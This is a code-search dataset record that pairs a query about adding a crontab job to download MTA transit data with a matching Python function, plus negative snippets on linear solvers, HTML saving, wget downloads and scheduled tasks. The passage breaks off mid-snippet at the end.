form we can say that [ a1_E | a2_E | a3_E ]*q_A = q_E\n##### Apply the same logic to vector ai we see [b1_E | b2_E | b3_E ]*ai_B = ai_E\n##### Hence, --> ////ai_B = cbm*ae_E|\\\\\\\\\n \n a123 = [np.array(x) for x in a123] #old basis\n b123 = [np.array(x) for x in b123] #new basis\n \n B = np.transpose(b123)\n \n invB = np.linalg.inv(B)\n a123_B = [np.dot(x,invB) for x in a123]\n A_B = np.transpose(a123_B) #representation of old vectors in new space (colum wise)\n print \" ... representation of old vectors in the new basis = \"\n for i in range(3):\n print \" %1.7f | %1.7f | %1.7f\" % (A_B[0][i], A_B[1][i], A_B[2][i])\n \n##### Build 5 unit cells all around\n comb = [] #array containing unit cell coordinates\n for i1 in range(-2,2):\n for i2 in range(-2,2):\n for i3 in range(-2,2):\n comb.append([i1,i2,i3])\n \n nuc = len(comb)\n b2atms = [] #new basis atoms \n b2map = [] #new basis map\n\n for uc in comb:\n for i in range(len(batms)):\n tmp = [ uc[0]+batms[i][0], uc[1]+batms[i][1], uc[2]+batms[i][2] ] # add all basis atoms in each unit cell\n prcs = 4 # significat figures for rounding\n tmp = np.array(tmp)\n tmp = np.dot(A_B,tmp) # matrix multiplication\n tmp = np.round(tmp,prcs) \n eps = 0 #needed for round off error\n if -eps<=tmp[0]<1+eps and -eps<=tmp[1]<1+eps and -eps<=tmp[2]<1+eps: # if in first unit cell\n b2atms.append(tmp.tolist())\n b2map.append( [uc[0],uc[1],uc[2],i] ) \n \n print \"--> New basis has \" + str(len(b2atms)) + \" atoms in fractional coordinates:\"\n for i in range(len(b2atms)):\n print ( \" %1.4f %1.4f %1.4f <-- %1.0f %1.0f %1.0f|%1.0f\" % \n (b2atms[i][0], b2atms[i][1], b2atms[i][2], b2map[i][0], b2map[i][1], b2map[i][2], b2map[i][3]) )", "def solveLinearSystem(aMat, bMat):\n numRow = aMat.rows\n dummyVec = mkVector(\"x\", numRow)\n dummySymbols = [v for v in dummyVec]\n #\n system = aMat, bMat\n result = sympy.linsolve(system, *dummyVec)\n lst = flatten(result)\n # Handle case of multiple solutions\n subs = {s: 1 for s in lst if s in dummySymbols}\n return evaluate(sympy.Matrix(lst), subs=subs)", "def solve_matrices(M, y, solve_algorithm=\"PCA\", use_gpu=False):\n\n if solve_algorithm == \"PCA\":\n #Use PCA via linalg.solve in either numpy or cupy\n if (use_gpu):\n #Use cupy linalg.solve to solve for zcoeff in batch for all_M and\n #all_y where all_M and all_y are 3d and 2d arrays representing\n #M and y at every redshift bin for the given template.\n #There is no Error thrown by cupy's version.\n return cp.linalg.solve(M, y)\n else:\n #Use numpy linalg.solve which throws exception\n try:\n return np.linalg.solve(M, y)\n except np.linalg.LinAlgError:\n raise\n elif solve_algorithm == \"NMF\":\n raise NotImplementedError(\"NMF is not yet implemented.\")\n else:\n raise NotImplementedError(\"The solve_algorithm \"+solve_algorithm+\" is not implemented.\")", "def solve(a, b):\n raise NotImplementedError", "def linear_program_ineq(self, c, A, b):\n if self.solver == solver_SCIPY:\n c = c.reshape((c.size,))\n b = b.reshape((b.size,))\n return scipy_linear_program_ineq(c, A, b)\n elif self.solver == solver_GUROBI:\n return gurobi_linear_program_ineq(c, A, b)\n else:\n raise ValueError('QP solver %s not available' % self.solver)", "def test_solver():\n # Choice of nonlinear coefficient\n m = 2\n\n def q(u):\n return (1+u)**m\n\n def Dq(u):\n return m*(1+u)**(m-1)\n\n u_exact = Expression(\n 'pow((pow(2, m+1)-1)*x[0] + 1, 1.0/(m+1)) - 1', m=m)\n linear_solver = 'direct'\n errors = []\n for method in 'alg_Newton', 'pde_Newton':\n for J_comp in 'manual', 'automatic':\n for degree in 1, 2, 3:\n error_prev = -1\n for divisions in [(10, 10), (20, 20), (40, 40)]:\n u = solver(\n q, Dq, f, divisions, degree,\n method, J_comp,\n linear_solver,\n abs_tol_Krylov=1E-10,\n rel_tol_Krylov=1E-10,\n abs_tol_Newton=1E-10,\n rel_tol_Newton=1E-10)\n\n # Find max error\n u_e = interpolate(u_exact, u.function_space())\n import numpy as np\n error = np.abs(u_e.vector().array() -\n u.vector().array()).max()\n # Expect convergence as h**(degree+1)\n if error_prev > 0:\n frac = abs(error - error_prev/2**(degree+1))\n errors.append(frac)\n error_prev = error\n tol = 4E-5\n for error_reduction in errors:\n assert error_reduction < tol, error_reduction", "def solve_motion_equations(M, B, state_vars=[], input_vars=[], parameters_values=dict()):\n\n M_shape = M.shape\n B_shape = B.shape\n assert(M_shape[0] == B_shape[0])\n\n # at first we create a buffer for the string that we complete and execute \n # to dynamically define a function and return it\n fnc_str_buffer = '''\ndef f(x, u, uuref, t, pp):\n # System variables\n %s # x_str\n %s # u_str\n \n # Parameters\n %s # par_str\n \n # Sympy Common Expressions\n %s # cse_str\n\n # Vectorfield\n %s # ff_str\n \n return ff\n'''\n\n #################################\n # handle system state variables #\n #################################\n # --> leads to x_str which shows how to unpack the state variables\n x_str = ''\n for var in state_vars:\n x_str += '%s, '%str(var)\n\n # as a last we remove the trailing '; ' to avoid syntax erros\n x_str = x_str + '= x'\n\n ##########################\n # handle input variables #\n ##########################\n # --> leads to u_str which will show how to unpack the inputs of the control system\n u_str = ''\n for var in input_vars:\n u_str += '%s, '%str(var)\n\n # after we remove the trailing '; ' to avoid syntax errors x_str will look like:\n # 'u1, u2, ... , um = u'\n u_str = u_str + '= u'\n\n ############################\n # handle system parameters #\n ############################\n # --> leads to par_str\n par_str = ''\n for k, v in list(parameters_values.items()):\n # 'k' is the name of a system parameter such as mass or gravitational acceleration\n # 'v' is its value in SI units\n par_str += '%s = %s; '%(str(k), str(v))\n\n # as a last we remove the trailing '; ' from par_str to avoid syntax errors\n par_str = par_str[:-2]\n\n # now solve the motion equations w.r.t. the accelerations\n sol = M.solve(B)\n\n # use SymPy's Common Subexpression Elimination\n cse_list, cse_res = sp.cse(sol, symbols=sp.numbered_symbols('q'))\n\n ################################\n # handle common subexpressions #\n ################################\n # --> leads to cse_str\n cse_str = ''\n #cse_list = [(str(l), str(r)) for l, r in cse_list]\n for cse_pair in cse_list:\n cse_str += '%s = %s; '%(str(cse_pair[0]), str(cse_pair[1]))\n\n # add result of cse\n for i in range(M_shape[0]):\n cse_str += 'q%d_dd = %s; '%(i, str(cse_res[0][i]))\n\n cse_str = cse_str[:-2]\n\n ######################\n # create vectorfield #\n ######################\n # --> leads to ff_str\n ff_str = 'ff = ['\n\n for i in range(M_shape[0]):\n ff_str += '%s, '%str(state_vars[2*i+1])\n ff_str += 'q%s_dd, '%(i)\n\n # remove trailing ',' and add closing brackets\n ff_str = ff_str[:-2] + ']'\n\n ############################\n # Create callable function #\n ############################\n # now we can replace all placeholders in the function string buffer\n fnc_str = fnc_str_buffer%(x_str, u_str, par_str, cse_str, ff_str)\n # and finally execute it which will create a python function 'f'\n # pass the current global scope to exec(). this is necessary so that sympy functions like cos/sin can be used\n globals_locals = globals()\n exec(fnc_str, globals_locals)\n\n # now we have defined a callable function that can be used within PyTrajectory\n return globals_locals['f']", "def _lin_solve(b, x, x0, a, c, iterations, n):\n c_recip = 1 / c\n for k in range(0, iterations):\n for m in range(1, n - 1):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, m, n)] = (x0[index_of(i, j, m, n)] + a * (x[index_of(i + 1, j, m, n)]\n + x[index_of(i - 1, j, m, n)]\n + x[index_of(i, j + 1, m, n)]\n + x[index_of(i, j - 1, m, n)]\n + x[index_of(i, j, m + 1, n)]\n + x[index_of(i, j, m - 1, n)]\n )) * c_recip\n _set_bounds(b, x, n)", "def solve(a, b):\n #-> getrf + getrs\n a, _, _ = get_computation_matrix(a)\n b, cv2, isM2 = get_computation_matrix(b)\n if a.get_dtype() != b.get_dtype():\n raise TypeError(\"solve: dtype of a and b are not compatible!\")\n if a.numRows() != a.numCols():\n raise ValueError(\"solve: input a is not a square matrix!\")\n t_dtype = TypeUtil.to_numpy_dtype(a.get_dtype())\n (_, _, x, _) = gesv(a, b, overwrite_a=1, overwrite_b=1, dtype=t_dtype)\n\n if cv2:\n if isM2:\n return x.to_numpy_matrix()\n else:\n return x.to_numpy_array()\n else:\n return x", "def solve(self, matrix, offset=0, temp_start=_DEFAULT_temp_start,\n temp_end=_DEFAULT_temp_end, tau=_DEFAULT_tau, beta=_DEFAULT_beta,\n maximize=_DEFAULT_maximize, algorithm=_DEFAULT_algorithm):\n self.api_instance = qc_qubosolv_api.ProblemApi(\n qc_qubosolv_api.ApiClient(self.configuration)\n )\n self.body = qc_qubosolv_api.Task()\n\n if isinstance(matrix, np.ndarray):\n self.body.matrix = matrix.tolist()\n else:\n self.body.matrix = matrix\n\n self.body.parameter = qc_qubosolv_api.Parameter()\n self.body.parameter.temp_start = temp_start\n self.body.parameter.temp_end = temp_end\n self.body.parameter.tau = tau\n self.body.parameter.beta = beta\n self.body.parameter.maximize = maximize\n self.body.parameter.algorithm = algorithm\n response_json = self.api_instance.task_post(self.body)\n self.response = SolverResult(json.loads(response_json), offset)\n return self.response", "def mprofile(r, alpha, beta,A,B):\n res = A*(1+(r/alpha)**2)**(-beta)+B\n return res" ]
[ "0.5931735", "0.56649315", "0.54215354", "0.5396154", "0.53851146", "0.53457224", "0.53208566", "0.53011686", "0.5298094", "0.52892774", "0.52748114", "0.52657866", "0.5221529", "0.5201853", "0.51484877", "0.5136199", "0.51290214", "0.51139814", "0.50912726", "0.508557", "0.50837845", "0.5074787", "0.5068235", "0.5068043", "0.50516355", "0.50391096", "0.5037902", "0.50341165", "0.5033496", "0.50207967" ]
0.63691556
0
adds a command to the system crontab to download the mta data.
def add_cron_job(nondated_url, curr_date): user = os.environ.get('USER', '') if user == '': usage("no USER env var set.") api_key = os.environ.get('MTA_API_KEY', '') if api_key == '': usage("no MTA_API_KEY env var set. Please add `export MTA_API_KEY=<KEY>` to .bashrc/.zshrc and try again.") if platform.system().startswith('Windows'): cron = CronTab(tab="""50 23 * * * pyenv activate mta && python {}/cron.py {} {} {} {} {} {}""".format(os.getcwd(), api_key, curr_date, BASE_DIR, REALTIME_COLOR_TO_FEEDID[LINE], LINE, STATS_FILENAME)) cron.write() else: cron = CronTab(user="{}".format(user)) job = cron.new(command="pyenv activate mta && python {}/cron.py {} {} {} {} {} {}".format(os.getcwd(), api_key, curr_date, BASE_DIR, REALTIME_COLOR_TO_FEEDID[LINE], LINE, STATS_FILENAME), comment="mta_downloader-{}".format(FILENAME_TS)) job.setall('50 23 * * *') cron.write()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cli(date, path, mission):\n download.main(path, mission, date)", "def add_daily(name, user, command, environment=None):\n add_task(name, '@daily', user, command, environment)", "def update_crontab(new_crontab):\n subprocess.run([\"crontab\", \"-\"], check=True, capture_output=True, text=True, input=\"\\n\".join(new_crontab))", "def add_task(name, timespec, user, command, environment=None):\n if environment is None:\n environment = {}\n\n lines = []\n\n # Write optional environment variables first\n for key, value in environment.iteritems():\n lines.append('%(key)s=%(value)s\\n' % locals())\n\n # Write the main crontab line\n lines.append('%(timespec)s %(user)s %(command)s\\n' % locals())\n\n from fabtools.require.files import file as require_file\n require_file(\n path='/etc/cron.d/%(name)s' % locals(),\n contents=''.join(lines),\n owner='root',\n mode='0644',\n use_sudo=True,\n )", "def _getcrontab(self):\n\t\twith os.popen(\"crontab -l 2>/dev/null\") as f:\n\t\t\tself.crontab = f.read()", "def cron(self):\n return", "def download_command(job_name, job_namespace, zone, cluster, project):\n command = LOGS_DOWNLOAD_COMMAND.format(**{\n 'project': project,\n 'zone': zone,\n 'namespace': job_namespace,\n 'pod': job_name,\n 'cluster': cluster\n })\n return command", "def setupcron():\n click.echo(\"Note that you should have run `dio setupemail` before this, or it will error out every time\")\n curr_cron = crontab.CronTab(user=True)\n if len(list(curr_cron.find_comment(\"diogenes8\"))) > 0:\n pass # do nothing\n else:\n job = curr_cron.new(command=\"dio recs\", comment=\"diogenes8\")\n job.hour.on(15)\n curr_cron.write_to_user(user=True)", "def set_download(self):\n print 'Setting download command...'\n wget = 0\n urllib = 0\n # JULIE : Cut proxy stuff...was causing problems (see scalapack installer if you want it back)\n if urllib == 0:\n # if urllib2 is not present checks if wget is present\n # in the PATH and if yes it sets the download command\n # to be wget\n print \"Checking availablility of wget...\",\n path=str(os.getenv('PATH')).split(os.pathsep)\n for i in path:\n if (os.path.isfile(os.path.join(i,'wget'))):\n print \"available\"\n wget = 1\n break\n if wget:\n # test wget\n print \"Testing wget...\",\n comm = 'wget --tries=2 --timeout=5 http://www.netlib.org/lapack/index'\n (output, error, retz) = runShellCommand(comm)\n if(retz != 0):\n print 'not working.'\n wget = -1\n else:\n print \"working\"\n self.downcmd=\"wget\"\n os.remove(\"index\")\n return\n else:\n # wget not available\n print \"not available\"\n wget=0", "async def _start_cron_task(self):\n pass", "def _get_cmd(self, url, options):\n if os.name == 'nt':\n cmd = [self.youtubedl_path] + options + [url]\n else:\n cmd = ['python', self.youtubedl_path] + options + [url]\n\n return cmd", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def cronjobs():\n cj.update_cronjob_db()", "def add_task(self,verbose = False):\n t = testrun()\n t.url = self.url\n t.runnable = self\n t.script = self.script\n t.location = self.location\n t.save()\n print \"Adding %s\" %(t)\n t.submit_to_wpt()", "def __download(self, year, month, day):\n print 'Download...'\n logging.info('[download]->Download...')\n t = datetime.datetime(year, month, day)\n spdata.download(stime=t, stations=self.aodSetting.stations, ftp_dir=self.aodSetting.ftp_root, data_dir=self.aodSetting.dd_dir, ftp_ip=self.aodSetting.ftp_ip,\n user=self.aodSetting.ftp_user, pword=self.aodSetting.ftp_psw)\n print 'Download Done!'\n logging.info('[download]->Download Done!')", "def download_command(arguments: List[str]) -> None:\n if len(arguments) != 3:\n print('Required 2 argument for download command') # noqa: WPS421\n return\n token = token_load.load()\n logic.download(token, gist_id=arguments[1], dest_path=arguments[2])", "def make_cron_command_task_daemon():\n # cmd_logger = '@reboot sudo -u {user_logger} {python_pathbin}/enerpi-daemon start'\n cmd_logger = 'sudo -u {user_logger} {python_pathbin}/enerpi-daemon start'\n local_params = dict(user_logger=CONFIG.get('ENERPI_DATA', 'USER_LOGGER', fallback='pi'),\n python_pathbin=os.path.dirname(sys.executable))\n return cmd_logger.format(**local_params)", "def download_command(self, args):\n self._validate_common(args)\n self._set_manifests(args)\n\n manifest = self._manager._remote\n manifest.load()\n\n records = self._get_matching_records(args, manifest)\n\n if not len(records):\n sys.exit(\"No matching items found.\")\n\n for record in records:\n try:\n self._manager.download(record['_type'], **record)\n print('Successfully downloaded file: {}'.format(record['_path']))\n except exceptions.ImmutableManifestError as e:\n if args.no_update:\n print('Asset already exists; will not download: {}'.format(record['_path']))\n else:\n raise e\n\n if len(records) > 1:\n print('All files successfully downloaded. Thank you.')", "def download(ctx: click.Context, **kwargs):\n root_commands.cmd_download(ctx.obj, **kwargs)", "def download_mission(self):\n cmds = self.vehicle.commands\n cmds.download()\n # Wait until download is complete.\n cmds.wait_valid()", "def download(self, output):\n self.wait()\n path = 'auditlogEntryReport/download'\n with open(output, 'w') as f:\n f.write(self._session.get(path))\n LOGGER.info('log downloaded: {}'.format(output))", "def _(event):\n\t\t\tself.continued_failure = 0\n\t\t\t\n\t\t\tif event.target is not self.download_thread:\n\t\t\t\treturn\n\t\t\t\t\n\t\t\tcmd = event.data.module.config.get(\"runafterdownload\")\n\t\t\tdefault_cmd = setting.get(\"runafterdownload\")\n\t\t\t\n\t\t\tcommands = []\n\t\t\t\n\t\t\tif cmd:\n\t\t\t\tcommands.append(cmd)\n\t\t\t\t\n\t\t\tif default_cmd and default_cmd not in commands:\n\t\t\t\tcommands.append(default_cmd)\n\t\t\t\n\t\t\tdef run_command():\n\t\t\t\tfor command in commands:\n\t\t\t\t\ttarget = quote(path_join(\n\t\t\t\t\t\tprofile(event.data.module.config[\"savepath\"]),\n\t\t\t\t\t\tsafefilepath(event.data.title)\n\t\t\t\t\t))\n\t\t\t\t\tif \"{target}\" in command:\n\t\t\t\t\t\tcommand = command.format(target=target)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcommand += \" \" + target\n\t\t\t\t\tprint(f\"run command: {command}\")\n\t\t\t\t\ttry:\n\t\t\t\t\t\tawait_(subprocess.call, command, shell=True) # nosec\n\t\t\t\t\texcept (OSError, subprocess.SubprocessError):\n\t\t\t\t\t\ttraceback.print_exc()\n\n\t\t\tasync_(run_command)", "def _Download( self ):\n self._DownloadPipe += PackageUtil.ExecuteSimpleCommand( \"git\", [\"clone\", \"[email protected]:mastbaum/avalanche.git\", self.GetInstallPath()], None, os.getcwd() )\n return", "def main():\n # the url for african daily and global daily\n african_dialy_url = \"https://data.chc.ucsb.edu/products/CHIRPS-2.0/africa_daily/tifs/p25/\"\n global_daily_url = \"https://data.chc.ucsb.edu/products/CHIRPS-2.0/global_daily/tifs/p25/\"\n\n\n each_year_list = GetRasterYears(url=african_dialy_url)\n new_path = makenewdir(each_year_list)\n years_new_list = fecthrasterurl(url=african_dialy_url)\n downloadwithwget(each_year_list, years_new_list, new_path)", "def save_data(self):\n # Command to get the download data\n pass", "def downloadTempGrab(self, url):\n if os.path.exists(\"temp.dat\"):\n os.remove(\"temp.dat\")\n cmd = \"wget -q -T 3 -t 1\" # 1 attempt (no retries)\n cmd += \" -O %s %s\" % (\"temp.dat\", url)\n self.log(cmd)\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n process.wait()", "def cli():\n fire.Fire(fetch_rss_file)", "def download_file(path, filename, destination):\n import os\n command = \"wget -q -O \"+destination+\"/\"+filename+\" ftp://nomads.ncdc.noaa.gov/\"+path+\"/\"+filename\n os.system(command)", "def get(self):\n url = \"http://twitter.com/statuses/public_timeline.json\"\n task = taskqueue.Task(\n url='/tasks/fetch',\n params={'url': url}\n )\n task.add('fetch')", "def logruncmd(self, cmd):\n self.logtxt(\"\\n[%s %s]\" % (datetime.datetime.now(), os.getcwd()), 'info')\n self.logtxt(\"%s\" % cmd, 'cmd')" ]
[ "0.6217518", "0.5839289", "0.5613374", "0.56113803", "0.5583703", "0.5540043", "0.53430545", "0.5286042", "0.52517474", "0.51973224", "0.5182088", "0.5155778", "0.5139559", "0.5131635", "0.5130064", "0.50975126", "0.50848424", "0.50634307", "0.5028002", "0.49883255", "0.49630895", "0.49507952", "0.4937796", "0.49339712", "0.492496", "0.4911067", "0.48969632", "0.48322538", "0.4827638", "0.48080146" ]
0.63708776
0
Saves html in specified filename in given path
def saveHtml(path: str, filename: str, html: str) -> None: filepath = os.path.join(path, filename) with open(filepath, "w") as fileHandle: fileHandle.write(html) return filepath
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save(self, filename):\n outfile = open(filename, \"w\")\n outfile.write(self.html.encode('utf8'))\n outfile.close()", "def make_backup(filename, html):\n\n with open(filename, 'wb') as f:\n f.write(html)", "def htmlSaveFile(self, filename):\n ret = libxml2mod.htmlSaveFile(filename, self._o)\n return ret", "def save(self):\n html_file = '{}/{}.html'.format(self.web_dir, self.title)\n f = open(html_file, 'wt')\n f.write(self.doc.render())\n f.close()", "def savecontents(contents, pathname):\n _maybe_mkdir(pathname)\n with open(pathname, 'w') as htmlfile:\n htmlfile.write(contents)", "def save_page_as(browser, file_name):\n\n with open(file_name, \"w\") as fout:\n fout.write(browser.find_element_by_tag_name(\"pre\").text)", "def save(self):\n f=open(\"{}/{}.html\".format(self.path,self.name),\"w\")\n f.write(\"<html>\\n <head>\\n\")\n for c in self.css:\n f.write(\" <link rel=\\\"Stylesheet\\\" href=\\\"{}\\\" />\\n\".format(c))\n f.write(\" </head>\\n</body>\\n\")\n for line in self.template.split(\"\\n\"):\n f.write(\" {}\\n\".format(line))\n f.write(\" </body>\\n</html>\")\n f.close()", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def _write_file(self, slug, folderpath, html):\n # check directories\n if not os.path.isdir(folderpath):\n try:\n os.makedirs(folderpath)\n self.info(\"Creating directory \" + folderpath)\n except Exception as e:\n self.err(e)\n return\n # construct file path\n filepath = folderpath + \"/\" + slug + \".html\"\n # write the file\n try:\n filex = open(filepath, \"w\")\n filex.write(html)\n filex.close()\n if self.notebook is False:\n self.ok(\"File written to\", filepath)\n else:\n html = '<a href=\"' + filepath + '\">' + filepath + '</a>'\n self.html(\"File written to\", html)\n except Exception as e:\n self.err(e)\n return filepath", "def save_html(self, file_name=None, raw_html=True):\n if raw_html:\n with open(file_name or self.url_obj.file_path, 'wb') as fh:\n fh.write(self.raw_html)\n else:\n self.lxml.getroottree().write(file_name or self.url_obj.file_path, method=\"html\")", "def write_to_html_file(self, data: str):\n try:\n os.mkdir(\"../\" + self.uri)\n except FileExistsError:\n pass\n\n f = open(\"../\" + self.uri + self.file_name, \"w\")\n f.write(data)\n print(\"[WRITE] written to .html file\")\n f.close()", "def save_into_html_file(path_html_file: str, response):\n html_file = open(path_html_file, 'w')\n html_file.writelines(response)\n html_file.close()\n\n with zipfile.ZipFile(path_html_file.replace('.html', '.zip'), 'w') as zf:\n zf.write(path_html_file, compress_type=zipfile.ZIP_DEFLATED)\n zf.close()\n os.remove(path_html_file)", "def save_html_files(dir_out, htmls, filenames):\n html_directory = os.path.join(dir_out, \"html\")\n for html, filename in zip(htmls, filenames):\n export_path = os.path.join(html_directory, filename + \".html\")\n with codecs.open(export_path, \"w\", encoding=\"utf-8\") as invoice_file:\n invoice_file.writelines(html)", "def save(self, path, project_name=\"project\"):\n save_path = os.path.join(path, self.save_path)\n save_path = re.sub(r\"/^{}/\".format(self.template.name), project_name, save_path)\n try:\n os.makedirs(os.path.dirname(save_path))\n except FileExistsError:\n pass\n file = open(save_path, \"w\")\n file.write(self.text)\n file.close()\n print(\"save file: \", save_path)", "def write_to_file(fname, html_body):\n dir_path = os.path.dirname(fname)\n ensure_dir_exists(dir_path)\n\n with open(fname, 'w') as html_file:\n html_file.write(html_body)", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def to_file(self, html_file: str = None) -> None:\n if not html_file:\n html_file = f\"{self.id}.html\"\n\n with open(html_file, \"w\") as f:\n f.write(self.soup.html)", "def write_html_file (folder, filename, contents):\n\n result = False\n\n try:\n f = codecs.open(os.path.join(folder, filename), 'w', ENCODING)\n f.write(contents)\n f.close()\n result = True\n except (OSError, IOError):\n print \"Sorry, could not save contents in\", os.path.join(folder, filename)\n\n return result", "def make_file():\n get_content = input(\"Paste the content for your html file, include your doctype, html tags and header, body etc.\\n\")\n get_name = input(\"what do you want to call your file?\\n\")\n \n new_html_file = open(str(get_name) + '.html', 'w')\n page_content = \"\" + str(get_content) + \"\"\n \n new_html_file.write(page_content)\n new_html_file.close()", "def exportHtmlFile(self):\n\n fileName = QtGui.QFileDialog.getSaveFileName(None,\"Save html file\", os.getenv('HOME'))\n if fileName:\n fileName += \".html\"\n #print ((\"Exporting: to \" + fileName))\n filedata = \"<html>\\n<head>\\n<title>\" + self.settings['projectName'] + \"</title>\\n</head>\\n<body>\\n\"\n #filedata += str(self.htmlResults.encode('utf-8'))\n modData = \"\"\n for c in self.htmlResults:\n if ord(c) < 128:\n modData += c\n else:\n modData += \"&#\" + str(ord(c)) + \";\"\n filedata += modData\n filedata += \"</body>\\n</html>\"\n f = open(fileName, 'w')\n f.write(filedata)\n f.close()\n self.log += \"Search Results exported to \" + fileName + \"\\n\"\n QtGui.QMessageBox.information(None, \"Html file Export\", str(fileName) + \" exported\")", "def save_news_in_html_file(news, path_to_html, logger):\n check_path_to_directory(path_to_html, logger)\n html_file = tags.html(title='RSS news')\n html_file.add(tags.head(tags.meta(charset='utf-8')))\n\n logger.info('Converting news to html format...')\n for article in news:\n html_factory(article, html_file)\n\n path = os.path.join(path_to_html, 'rss_news.html')\n logger.info('Creating html-file...')\n with open(path, 'w', encoding='utf-8') as file_html:\n file_html.write(str(html_file))\n logger.info('Html-file is created successfully!')\n return file_html", "def save(self, content_dir):\n print_verbose(\n \"INFO : Writing random HTML documents to files...\",\n self.args.verbose,\n )\n for i in range(self.n):\n dir_path = content_dir + \"/\" + \"staticpage\" + str(i)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n index_file = os.path.join(dir_path, \"index.html\") \n with open(index_file, \"w\") as file:\n file.write(self.doc_strings[i].decode(\"utf-8\"))", "def save_html(self, report_summary, file_name, folder):\n myfile = open(file_name, \"w\")\n myfile.write(t('! DOCTYPE html') + nl())\n myfile.write(t('html') + nl())\n myfile.write(t('head') + nl())\n myfile.write(t('link type=\"text/css\" rel=\"stylesheet\" ') + nl())\n\n myfile.write(html_space(4) + t('style'))\n myfile.write('table{width= 100%; border-collapse:collapse; border:1px solid black collapse}')\n myfile.write('th,td {padding:3px}' + nl())\n myfile.write(html_space(8) + 'td.detail{background-color:#D5DF93; font-size:20; '\n 'font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.detail1{font-size:20; '\n 'font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.detail2{font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif}' + nl())\n myfile.write(html_space(8) + 'td.header0{background-color:#8fac3a; font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.header1{background-color:#E6E6E6; font-size:20;'\n ' font-family:Helvetica, Arial, Sans Serif; font-weight:bold}' + nl())\n myfile.write(html_space(8) + 'td.header2{font-size:20; width:50%}' + nl())\n myfile.write(html_space(4) + t('/style') + nl())\n\n myfile.write(t('/head') + nl())\n myfile.write(t('body') + nl())\n\n # Project summary\n self.company_name = str(report_summary[\"ProfileSummary\"]['CompanyName'])\n self.company_logo = str(report_summary[\"ProfileSummary\"]['CompanyLogo'])\n\n self.group_team_name = str(report_summary[\"ProfileSummary\"]['Group/TeamName'])\n self.designer = str(report_summary[\"ProfileSummary\"]['Designer'])\n self.project_title = str(report_summary['ProjectTitle'])\n self.sub_title = str(report_summary['Subtitle'])\n self.job_number = str(report_summary['JobNumber'])\n self.client = str(report_summary['Client'])\n additional_comments = str(report_summary['AdditionalComments'])\n\n # Seated angle design parameters\n connectivity = str(self.connectivity)\n shear_force = str(self.shear_force)\n column_sec = str(self.column_section)\n column_fu = str(self.column_fu)\n beam_sec = str(self.beam_section)\n seated_angle_section = str(self.angle_sec)\n top_angle_section = str(self.top_angle)\n angle_fu = str(self.angle_fu)\n\n bolt_type = str(self.bolt_type)\n is_hsfg = self.is_hsfg\n bolt_grade = str(self.bolt_grade)\n bolt_diameter = str(self.bolt_diameter)\n bolt_fu = str(self.bolt_fu)\n is_environ_corrosive = self.is_environ_corrosive\n\n # Design Preferences\n detail_gap = str(self.detail_gap)\n bolt_hole_clearance = str(self.bolt_hole_clearance)\n bolt_hole_type = str(self.bolt_hole_type)\n bolt_material_grade = self.bolt_fu_overwrite\n slip_factor_mu_f = self.mu_f\n min_edge_multiplier = self.min_edge_multiplier\n type_of_edge = self.type_of_edge\n design_method = self.design_method\n\n # Calculation outputs\n bolts_provided = str(self.bolts_provided)\n bolts_required = str(self.bolts_required)\n\n number_of_rows = str(self.num_rows)\n number_of_cols = str(self.num_cols)\n edge = str(self.edge_dist)\n gauge = str(self.gauge)\n pitch = str(self.pitch)\n end = str(self.end_dist)\n\n kb = str(self.k_b)\n beam_w_t = str(self.beam_w_t)\n beam_fu = str(self.beam_fu)\n dia_hole = str(self.bolt_hole_diameter)\n shear_capacity = str(self.bolt_shear_capacity)\n bearing_capacity = str(self.bolt_bearing_capacity)\n\n check_pass = \"<p align=left style=color:green><b>Pass</b></p>\"\n check_fail = \"<p align=left style=color:red><b>Fail</b></p>\"\n\n if self.safe == True:\n remark = check_pass\n elif self.safe == False:\n remark = check_fail\n\n # -----------------------------------------------------------------------------------\n rstr = self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # ---------------------------------- Design conclusion ------------------------------\n rstr += t('table border-collapse= \"collapse\" border=\"1px solid black\" width= 100% ') + nl()\n\n rstr += design_summary_row(0, \"Design Conclusion\", \"header0\", col_span=\"2\")\n\n row = [1, \"Seated Angle\", remark]\n rstr += t('tr')\n rstr += html_space(1) + t('td class=\"detail1 \"') + space(row[0]) + row[1] + t('/td')\n rstr += t('td class=\"detail1\"') + row[2] + t('/td') + nl()\n # rstr += t('td class=\"header1 safe\"') + row[3] + t('/td')\n rstr += t('/tr')\n\n rstr += design_summary_row(0, \"Seated Angle\", \"header0\", col_span=\"2\")\n rstr += design_summary_row(0, \"Connection Properties\", \"detail\", col_span=\"2\")\n rstr += design_summary_row(0, \"Connection \", \"detail1\", col_span=\"2\")\n rstr += design_summary_row(1, \"Connection Title\", \"detail2\", text_two=\" Seated Angle\")\n rstr += design_summary_row(1, \"Connection Type\", \"detail2\", text_two=\" Shear Connection\")\n rstr += design_summary_row(0, \"Connection Category\", \"detail1\")\n rstr += design_summary_row(1, \"Connectivity\", \"detail2\", text_two=str(connectivity))\n rstr += design_summary_row(1, \"Beam Connection\", \"detail2\", text_two=\"Bolted\")\n rstr += design_summary_row(1, \"Column Connection\", \"detail2\", text_two=\"Bolted\")\n rstr += design_summary_row(0, \"Loading (Factored 